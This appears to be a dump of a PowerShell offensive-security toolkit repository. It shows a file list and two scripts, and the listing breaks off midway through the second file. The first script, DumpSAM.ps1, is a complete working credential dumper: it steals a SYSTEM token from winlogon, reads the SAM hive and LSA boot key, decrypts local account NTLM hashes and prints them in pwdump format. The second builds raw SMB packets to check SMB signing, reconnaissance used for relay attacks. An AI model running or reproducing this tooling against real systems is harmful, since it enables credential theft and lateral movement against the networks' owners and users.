├── DumpSAM.ps1
├── Get-SMBSigning.ps1
├── Invoke-MSSQLup.ps1
├── Invoke-Mongoose.ps1
├── Invoke-NETMongoose.ps1
├── Invoke-NTDS.ps1
├── Invoke-Pandemonium.ps1
├── Invoke-SharpRDPTest.ps1
└── Kirby.ps1


/DumpSAM.ps1:
--------------------------------------------------------------------------------
 1 | function DumpSAM{$ErrorActionPreference = "SilentlyContinue"
 2 | try{&{[void][impsys.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Runtime.InteropServices;namespace impsys{public class win32{[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern bool CloseHandle(IntPtr hHandle);[DllImport(`"kernel32.dll`",SetLastError=true)]public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,int processId);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool OpenProcessToken(IntPtr ProcessHandle,uint DesiredAccess,out IntPtr TokenHandle);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool DuplicateTokenEx(IntPtr hExistingToken,uint dwDesiredAccess,IntPtr lpTokenAttributes,uint ImpersonationLevel,uint TokenType,out IntPtr phNewToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern bool RevertToSelf();}}"}
 3 | function IAS{[CmdletBinding()]param([Parameter(Mandatory=$true,Position=0)][scriptblock]$Process,[Parameter(Position=1)][object[]]$ArgumentList);$a=GPS -Name "winlogon"|Select -First 1 -ExpandProperty Id;if(($b=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$a)) -eq [IntPtr]::Zero){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not [impsys.win32]::OpenProcessToken($b,0x0E,[ref]$d)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$f=[IntPtr]::Zero;if(-not [impsys.win32]::DuplicateTokenEx($d,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not [impsys.win32]::ImpersonateLoggedOnUser($f)){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}& $Process @ArgumentList}finally{if(-not [impsys.win32]::RevertToSelf()){$c=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}}}
 4 | try{&{[void][ntlmx.win32]}}catch{Add-Type -TypeDefinition "using System;using System.Text;using System.Runtime.InteropServices;namespace ntlmx{public class win32{[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegOpenKeyEx(IntPtr hKey,string subKey,int ulOptions,int samDesired,out IntPtr hkResult);[DllImport(`"advapi32.dll`",SetLastError=true,CharSet=CharSet.Auto)]public static extern int RegQueryInfoKey(IntPtr hkey,StringBuilder lpClass,ref int lpcbClass,int lpReserved,out int lpcSubKeys,out int lpcbMaxSubKeyLen,out int lpcbMaxClassLen,out int lpcValues,out int lpcbMaxValueNameLen,out int lpcbMaxValueLen,out int lpcbSecurityDescriptor,IntPtr lpftLastWriteTime);[DllImport(`"advapi32.dll`",SetLastError=true)]public static extern int RegCloseKey(IntPtr hKey);}}"}
 5 | function GNLPH{GCI "HKLM:SAM\SAM\Domains\Account\Users"|?{$_.PSChildName -match "^[0-9A-F]{8}$"}|%{$ae=$_.PSChildName;$v=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account\Users\$ae" -Name V).V;$f=(Get-ItemProperty "HKLM:SAM\SAM\Domains\Account" -Name F).F;$xc=-join(&{"JD","Skew1","GBG","Data"|%{$ou=[IntPtr]::Zero;if([ntlmx.win32]::RegOpenKeyEx(0x80000002,"SYSTEM\CurrentControlSet\Control\Lsa\$_",0x0,0x19,[ref]$ou)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}$lp=New-Object Text.StringBuilder 1024;[int]$oz=1024;if([ntlmx.win32]::RegQueryInfoKey($ou,$lp,[ref]$oz,0x0,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,[IntPtr]::Zero)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error();throw [ComponentModel.Win32Exception]$e}[void][ntlmx.win32]::RegCloseKey($ou);$lp.ToString()}});$md5=[Security.Cryptography.MD5]::Create();$q=[Security.Cryptography.Aes]::Create();$q.Mode=[Security.Cryptography.CipherMode]::CBC;$q.Padding=[Security.Cryptography.PaddingMode]::None;$q.KeySize=128;$k=[Security.Cryptography.DES]::Create();$k.Mode=[Security.Cryptography.CipherMode]::ECB;$k.Padding=[Security.Cryptography.PaddingMode]::None;$uu=[BitConverter]::ToInt32($v,0x0C)+0xCC;$len=[BitConverter]::ToInt32($v,0x10);$username=[Text.Encoding]::Unicode.GetString($v,$uu,$len);$uu=[Bitconverter]::ToInt32($v,0xA8)+0xCC;$bk=8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7|%{[Convert]::ToByte("$($xc[$_*2])$($xc[$_*2+1])",16)};switch($v[0xAC]){0x38{$enc_syskey=$f[0x88..0x97];$enc_syskey_iv=$f[0x78..0x87];$enc_syskey_key=$bk;$syskey=$q.CreateDecryptor($enc_syskey_key,$enc_syskey_iv).TransformFinalBlock($enc_syskey,0,16);$enc_ntlm=$v[($uu+24)..($uu+24+0x0F)];$enc_ntlm_iv=$v[($uu+8)..($uu+23)];$enc_ntlm_key=$syskey;$enc_ntlm=$q.CreateDecryptor($enc_ntlm_key,$enc_ntlm_iv).TransformFinalBlock($enc_ntlm,0,16)}0x14{$enc_syskey=$f[0x80..0x8f];$enc_syskey_key=$md5.ComputeHash($f[0x70..0x7f]+[Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0")+$bk+[Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"));$syskey=rc4 $enc_syskey $enc_syskey_key;$enc_ntlm=$v[($uu+4)..($uu+4+0x0F)];$enc_ntlm_key=$md5.ComputeHash($syskey+(3,2,1,0|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)})+[Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"));$enc_ntlm=rc4 $enc_ntlm $enc_ntlm_key}default{New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM="31D6CFE0D16AE931B73C59D7E0C089C0"}}}$k_str_1=3,2,1,0,3,2,1|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_str_2=0,3,2,1,0,3,2|%{[Convert]::ToByte("$($ae[$_*2])$($ae[$_*2+1])",16)};$k_key_1=str_to_key $k_str_1;$k_key_2=str_to_key $k_str_2;$ntlm_1=$k.CreateDecryptor($k_key_1,$k_key_1).TransformFinalBlock($enc_ntlm,0,8);$ntlm_2=$k.CreateDecryptor($k_key_2,$k_key_2).TransformFinalBlock($enc_ntlm,8,8);$ntlm=[BitConverter]::ToString($ntlm_1+$ntlm_2)-replace '-','';New-Object PSObject -Property @{Username=$username;RID=[int]"0x$ae";NTLM=$ntlm}}}
 6 | function rc4($d,$k){$r=$d;$s,$k=@(0..255),@($k*256);$j=0;0..255|%{$j=($j+$s[$_]+$k[$_])%256;$s[$_],$s[$j]=$s[$j],$s[$_]}
 7 | $i=$j=0;0..($r.Length-1)|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$t=($s[$i]+$s[$j])%256;$r[$_]=$r[$_]-bxor$s[$t]};$r}
 8 | function str_to_key($s) {
 9 | $odd_parity=@(1,1,2,2,4,4,7,7,8,8,11,11,13,13,14,14,16,16,19,19,21,21,22,22,25,25,26,26,28,28,31,31,32,32,35,35,37,37,38,38,41,41,42,42,44,44,47,47,49,49,50,50,52,52,55,55,56,56,59,59,61,61,62,62,64,64,67,67,69,69,70,70,73,73,74,74,76,76,79,79,81,81,82,82,84,84,87,87,88,88,91,91,93,93,94,94,97,97,98,98,100,100,103,103,104,104,107,107,109,109,110,110,112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254);$0=@();$0+=bitshift $s[0]-1;$0+=(bitshift ($s[0]-band 0x01) 6)-bor(bitshift $s[1]-2);$0+=(bitshift ($s[1]-band 0x03) 5)-bor(bitshift $s[2]-3);$0+=(bitshift ($s[2]-band 0x07) 4)-bor(bitshift $s[3]-4);$0+=(bitshift ($s[3]-band 0x0F) 3)-bor(bitshift $s[4]-5);$0+=(bitshift ($s[4]-band 0x1F) 2)-bor(bitshift $s[5]-6);$0+=(bitshift ($s[5]-band 0x3F) 1)-bor(bitshift $s[6]-7);$0+=$s[6]-band 0x7F;$0[0]=$odd_parity[(bitshift $0[0] 1)];$0[1]=$odd_parity[(bitshift $0[1] 1)];$0[2]=$odd_parity[(bitshift $0[2] 1)];$0[3]=$odd_parity[(bitshift $0[3] 1)];$0[4]=$odd_parity[(bitshift $0[4] 1)];$0[5]=$odd_parity[(bitshift $0[5] 1)];$0[6]=$odd_parity[(bitshift $0[6] 1)];$0[7]=$odd_parity[(bitshift $0[7] 1)];$0}
10 | function bitshift($x, $c){return [math]::Floor($x * [math]::Pow(2, $c))}
11 | $users=IAS -Process {GNLPH};$excludedUsernames=@("Guest","DefaultAccount","WDAGUtilityAccount");foreach($user in $users){if($user.Username-notin$excludedUsernames){$output="$($user.Username):$($user.RID):aad3b435b51404eeaad3b435b51404ee:$($user.NTLM.ToLower()):::";$Output}}}
12 | DumpSAM
13 | 


--------------------------------------------------------------------------------
/Get-SMBSigning.ps1:
--------------------------------------------------------------------------------
  1 | Function Get-SMBSigning  {
  2 | 
  3 | Param (
  4 |     [String]$Target,
  5 |     [String[]]$Targets=@(),
  6 |     [Float]$Delay,
  7 |     [Float]$DelayJitter
  8 |     ) 
  9 | 
 10 |     #borrowed from https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Relay.ps1
 11 |     function ConvertFrom-PacketOrderedDictionary
 12 |     {
 13 |         param($packet_ordered_dictionary)
 14 | 
 15 |         ForEach($field in $packet_ordered_dictionary.Values)
 16 |         {
 17 |             $byte_array += $field
 18 |         }
 19 | 
 20 |         return $byte_array
 21 |     }
 22 | 
 23 |     #NetBIOS
 24 | 
 25 |     function Get-PacketNetBIOSSessionService()
 26 |     {
 27 |         param([Int]$packet_header_length,[Int]$packet_data_length)
 28 | 
 29 |         [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
 30 |         $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
 31 | 
 32 |         $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
 33 |         $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00))
 34 |         $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length))
 35 | 
 36 |         return $packet_NetBIOSSessionService
 37 |     }
 38 | 
 39 |     #SMB1
 40 | 
 41 |     function Get-PacketSMBHeader()
 42 |     {
 43 |         param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
 44 | 
 45 |         $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
 46 |         $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
 47 |         $packet_SMBHeader.Add("SMBHeader_Command",$packet_command)
 48 |         $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00))
 49 |         $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00))
 50 |         $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00))
 51 |         $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags)
 52 |         $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2)
 53 |         $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00))
 54 |         $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
 55 |         $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00))
 56 |         $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID)
 57 |         $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID)
 58 |         $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID)
 59 |         $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00))
 60 | 
 61 |         return $packet_SMBHeader
 62 |     }
 63 | 
 64 |     function Get-PacketSMBNegotiateProtocolRequest()
 65 |     {
 66 |         param([String]$packet_version)
 67 | 
 68 |         if($packet_version -eq "SMB1")
 69 |         {
 70 |             [Byte[]]$packet_byte_count = 0x0c,0x00
 71 |         }
 72 |         else
 73 |         {
 74 |             [Byte[]]$packet_byte_count = 0x22,0x00  
 75 |         }
 76 | 
 77 |         $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
 78 |         $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00))
 79 |         $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count)
 80 |         $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
 81 |         $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
 82 | 
 83 |         if($packet_version -ne "SMB1")
 84 |         {
 85 |             $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
 86 |             $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
 87 |             $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
 88 |             $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
 89 |         }
 90 | 
 91 |         return $packet_SMBNegotiateProtocolRequest
 92 |     }
 93 | 
 94 |     function Get-PacketSMBSessionSetupAndXRequest()
 95 |     {
 96 |         param([Byte[]]$packet_security_blob)
 97 | 
 98 |         [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
 99 |         $packet_byte_count = $packet_byte_count[0,1]
100 |         [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
101 |         $packet_security_blob_length = $packet_security_blob_length[0,1]
102 | 
103 |         $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
104 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c))
105 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff))
106 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00))
107 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
108 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff))
109 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00))
110 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00))
111 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
112 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count)
113 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
114 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
115 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length)
116 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob)
117 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00))
118 |         $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00))
119 | 
120 |         return $packet_SMBSessionSetupAndXRequest 
121 |     }
122 | 
123 |     function Get-PacketSMBTreeConnectAndXRequest()
124 |     {
125 |         param([Byte[]]$packet_path)
126 | 
127 |         [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
128 |         $packet_path_length = $packet_path_length[0,1]
129 | 
130 |         $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
131 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04))
132 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff))
133 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00))
134 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
135 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00))
136 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00))
137 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length)
138 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00))
139 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path)
140 |         $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
141 | 
142 |         return $packet_SMBTreeConnectAndXRequest
143 |     }
144 | 
145 |     function Get-PacketSMBNTCreateAndXRequest()
146 |     {
147 |         param([Byte[]]$packet_named_pipe)
148 | 
149 |         [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
150 |         $packet_named_pipe_length = $packet_named_pipe_length[0,1]
151 |         [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
152 |         $packet_file_name_length = $packet_file_name_length[0,1]
153 | 
154 |         $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
155 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18))
156 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff))
157 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00))
158 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
159 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00))
160 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length)
161 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
162 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00))
163 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
164 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
165 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
166 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
167 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00))
168 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
169 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
170 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00))
171 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length)
172 |         $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe)
173 | 
174 |         return $packet_SMBNTCreateAndXRequest
175 |     }
176 | 
177 |     function Get-PacketSMBReadAndXRequest()
178 |     {
179 |         $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
180 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a))
181 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff))
182 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00))
183 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
184 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40))
185 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00))
186 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02))
187 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02))
188 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff))
189 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00))
190 |         $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00))
191 | 
192 |         return $packet_SMBReadAndXRequest
193 |     }
194 | 
195 |     function Get-PacketSMBWriteAndXRequest()
196 |     {
197 |         param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
198 | 
199 |         [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
200 |         $packet_write_length = $packet_write_length[0,1]
201 | 
202 |         $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
203 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e))
204 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff))
205 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00))
206 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
207 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",$packet_file_ID)
208 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00))
209 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
210 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00))
211 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",$packet_write_length)
212 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00))
213 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length)
214 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00))
215 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
216 |         $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length)
217 | 
218 |         return $packet_SMBWriteAndXRequest
219 |     }
220 | 
221 |     function Get-PacketSMBCloseRequest()
222 |     {
223 |         param ([Byte[]]$packet_file_ID)
224 | 
225 |         $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
226 |         $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03))
227 |         $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID)
228 |         $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
229 |         $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00))
230 | 
231 |         return $packet_SMBCloseRequest
232 |     }
233 | 
234 |     function Get-PacketSMBTreeDisconnectRequest()
235 |     {
236 |         $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
237 |         $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00))
238 |         $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00))
239 | 
240 |         return $packet_SMBTreeDisconnectRequest
241 |     }
242 | 
243 |     function Get-PacketSMBLogoffAndXRequest()
244 |     {
245 |         $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
246 |         $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02))
247 |         $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff))
248 |         $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00))
249 |         $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
250 |         $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00))
251 | 
252 |         return $packet_SMBLogoffAndXRequest
253 |     }
254 | 
255 |     #SMB2
256 | 
257 |     function Get-PacketSMB2Header()
258 |     {
259 |         param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
260 | 
261 |         [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
262 | 
263 |         $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
264 |         $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
265 |         $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00))
266 |         $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00))
267 |         $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00))
268 |         $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00))
269 |         $packet_SMB2Header.Add("SMB2Header_Command",$packet_command)
270 |         $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00))
271 |         $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00))
272 |         $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
273 |         $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID)
274 |         $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
275 |         $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID)
276 |         $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID)
